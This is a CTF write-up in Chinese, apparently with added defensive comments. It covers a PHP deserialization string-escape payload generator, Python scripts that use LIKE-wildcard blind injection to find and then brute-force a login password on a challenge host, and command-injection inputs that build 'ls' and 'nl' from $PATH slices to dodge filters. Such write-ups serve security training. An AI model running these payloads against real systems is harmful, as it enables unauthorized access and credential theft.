0x01 web1_此夜圆 (反序列化逃逸)
下载附件拿到源码，是反序列化逃逸的题。
懒得算,直接遍历Firebasky的数量
<?php
// Silence all PHP diagnostics for the demo. Note this also hides the notice that
// unserialize() emits on malformed input; on a real endpoint keep error logging on
// server-side so broken/tampered serialized data is at least visible in logs.
error_reporting(0);
// Target class of the challenge: a trivial credential holder whose password check
// runs automatically on unserialize().
class a
{
    // Both properties are public, so unserialize() populates them straight from the
    // serialized string; the constructor below is never involved on that path.
    public $uname;
    public $password;

    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }

    // Invoked by PHP right after unserialize() rebuilds the object. The comparison is
    // strict (===) against the literal 'yu22x', but nothing here verifies where the
    // serialized bytes came from — whoever controls them controls $this->password.
    public function __wakeup()
    {
        if($this->password==='yu22x')
        {
            echo "success!";
        }
        else
        {
            echo 'wrong password';
        }
    }
}
/**
 * Rewrite every occurrence of 'Firebasky' in $string as 'Firebaskyup'.
 *
 * The replacement is two bytes longer than the needle. Applied to an already
 * serialized value this desynchronises the s:N length prefixes from the real
 * content, which is the root cause of the escape shown below — sanitisation
 * belongs before serialize(), never on the serialized form.
 */
function filter($string){
    $needle = 'Firebasky';
    $replacement = $needle . 'up';
    return str_replace($needle, $replacement, $string);
}
// Baseline: serialize an honest object and run the post-serialization filter on it.
$o = new a("test",1);
$encode = filter(serialize($o));
echo "正常格式:".$encode."\n";
// Enumerate payloads: i copies of "Firebasky" followed by ";s:8:"password";s:5:"yu22x";}
// Each replacement grows the uname *content* by 2 bytes while its s:N prefix, computed
// before filter() ran, stays the same. Once the surplus (2*i) equals the length of the
// appended suffix, unserialize() reads the suffix as the object's own password field
// and the genuine password that follows is dropped. The loop just tries every count
// instead of computing it by hand (the run below stops at 15 copies).
for ($i=0; $i < 40; $i++) {
    $payload = str_repeat("Firebasky",$i).'";s:8:"password";s:5:"yu22x";}';
    $o = new a($payload,1);
    $encode = filter(serialize($o));
    // Defender's note: this is exactly why rewriting serialized text is unsafe. Filter or
    // validate the fields before serialize(), and/or authenticate the blob (e.g. an HMAC)
    // or use a data-only format such as JSON so no magic methods run on load.
    $decode = unserialize($encode);
    // Loose == is fine here: for a matching payload $decode is an `a` holding exactly
    // "yu22x"; for a malformed one unserialize() returns false and the property read
    // yields null (the warning is hidden by error_reporting(0)), so the test is false.
    if($decode->password=="yu22x"){
        echo "\npayload为:".$payload;
    }
}
结果:
正常格式:O:1:"a":2:{s:5:"uname";s:4:"test";s:8:"password";i:1;}
wrong passwordflag
payload为:FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}[Finished in 0.1s]
0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母)
在登录页面的源代码中可以看到一些提示
用户名为yu22x，查询语句为like，可以使用通配符%和_。
百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。
fuzz了一下，被过滤的有这些字符：%号被过滤了，但 _ 没有被过滤，所以我们可以使用 _。
写个脚本测试一下密码长度
import requests

# NOTE(review): these headers are built but never passed to requests.post() below, so
# every request actually goes out with python-requests' default User-Agent.
headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
# Template for the POST body; also unused — each call below builds its own dict.
data = {
    "username": "yu22x",
    "password": "{0}"
}
# Baseline request with a password that cannot match ("a"). Its body length is the size
# of the "wrong password" page; the loop below compares against the hard-coded 52, which
# presumably is what this print() showed in the author's run.
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("a")})
print(len(req.text))
# The login compares the password with LIKE, and "_" matches exactly one character, so a
# password made of i underscores matches only when the stored password is i characters
# long; a response of a different length therefore reveals the length (32 on this target).
# Server-side fix: compare with = (or escape % and _ in the LIKE pattern) and rate-limit
# login attempts — a burst of underscore-only passwords from one client is an easy signature.
for i in range(1, 50):
    req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("_" * i)})
    if len(req.text) != 52:
        print("[+] 长度为", i)
长度为32
然后用32个_去登录（用户名yu22x，密码________________________________），返回：
I have filtered all the characters. Why can you come in? get out!
看来是必须用真实的密码登录,写个脚本跑一下
import requests

# NOTE(review): as in the length probe above, headers is defined but never sent.
headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
# Unused template; each request builds its own body dict.
data = {
    "username": "yu22x",
    "password": "{0}"
}
# Candidate alphabet tried at every position.
fuzz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
# Prefix recovered so far.
res = ""
# Recover the 32-character password one position at a time: known prefix + one candidate
# + enough "_" wildcards to pad the pattern to exactly 32, so the LIKE succeeds only when
# the candidate is right. (The commented-out print pads with 32-i, one character too many.)
for i in range(32):
    for j in fuzz:
        req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format(res+j+"_"*(31-i))})
        # print(res+j+"_"*(32-i))
        # Success is inferred from the absence of "wrong" in the page body, not from a
        # status code. If no candidate matches at a position the prefix silently stays
        # short and every later pattern is mis-padded.
        if "wrong" not in req.text:
            res += j
            print(res)
            break
得到密码67815b0c009ee970fe4014abaa3Fa6A0
后面的步骤没想到，最开始还以为是SSRF，看了题解才知道怎么做。
利用环境变量构造ls
0;${PATH:5:1}${PATH:11:1}
构造nl
0;${PATH:14:1}${PATH:5:1} ????.???